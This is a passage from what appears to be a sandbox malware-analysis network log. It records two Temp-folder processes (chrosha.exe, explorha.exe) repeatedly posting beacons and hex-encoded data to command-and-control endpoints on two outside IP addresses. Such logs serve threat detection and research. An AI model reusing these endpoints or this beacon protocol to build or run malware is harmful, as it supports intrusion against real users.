Apr 19, 2024 03:32:00.428931952 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
441 | 192.168.2.5 | 50285 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:00.538774014 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:00.780312061 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
442 | 192.168.2.5 | 50286 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:00.793606043 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:01.045970917 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:00 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
443 | 192.168.2.5 | 50287 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:01.033885002 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:01.286737919 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
444 | 192.168.2.5 | 50288 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:01.298433065 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:01.551254988 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
445 | 192.168.2.5 | 50289 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:01.651972055 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:01.902004957 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:01 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
446 | 192.168.2.5 | 50290 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:01.913290977 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:02.158507109 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
447 | 192.168.2.5 | 50291 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:02.149525881 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:02.397469044 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
448 | 192.168.2.5 | 50292 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:02.406327963 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:02.654135942 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
449 | 192.168.2.5 | 50293 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:02.756772995 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:03.001389980 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:02 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
450 | 192.168.2.5 | 50294 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:03.008313894 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:03.252196074 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
451 | 192.168.2.5 | 50295 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:03.251945019 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:03.503062010 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
452 | 192.168.2.5 | 50296 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:03.507286072 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:03.762892962 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
453 | 192.168.2.5 | 50297 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:03.866053104 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:04.108968019 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:03 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
454 | 192.168.2.5 | 50298 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:04.117784023 CEST | 158 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:04.364065886 CEST | 219 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Refresh: 0; url = Login.php
                                                                                                                                                                                                                                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 1 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
455 | 192.168.2.5 | 50299 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:04.359121084 CEST | 309 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 44 36 32 37 42 35 30 44 37 39 42 46 30 34 30 30 43 42 42 32 42 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 34 35 37 33 46 46 34 45 36 34 31 32 41 37 34 36 35 41 31 46 46 34 39 30 30 42 32 44 45 46 33 43 30 41 30 41 41 39 42 43 32 32 43 38 44 31 35 39 32 34 35 35 45 37 42 35 38 30 39 41 44
                                                                                                                                                                                                                                      Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2AD627B50D79BF0400CBB2BB81278509C05BEA3669A52777FA61354573FF4E6412A7465A1FF4900B2DEF3C0A0AA9BC22C8D1592455E7B5809AD
Apr 19, 2024 03:32:04.610210896 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
456 | 192.168.2.5 | 50300 | 193.233.132.56 | 80 | 4484 | C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:04.612246990 CEST | 312 | OUT | POST /Pneh2sXQk0/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.56
                                                                                                                                                                                                                                      Content-Length: 156
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 43 32 33 38 43 41 39 46 30 42 45 32 35 41 42 41 35 46 39 45 36 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 30 41 46 34 33 43 46 46 39 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                                                                                                                                                                                                                                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADC238CA9F0BE25ABA5F9E64578B4B5647A288E7F81008DA96AE6C7F0AF43CFF9FD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Apr 19, 2024 03:32:04.860893965 CEST | 196 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:04 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 7 <c><d>0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
457 | 192.168.2.5 | 50301 | 193.233.132.167 | 80 | 8024 | C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 03:32:04.964756966 CEST | 155 | OUT | POST /enigma/index.php HTTP/1.1
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      Host: 193.233.132.167
                                                                                                                                                                                                                                      Content-Length: 4
                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                      Data Raw: 73 74 3d 73
                                                                                                                                                                                                                                      Data Ascii: st=s
Apr 19, 2024 03:32:05.212872028 CEST | 197 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:32:05 GMT
                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                      Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 8 <c>3<d>0


                                                                                                                                                                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
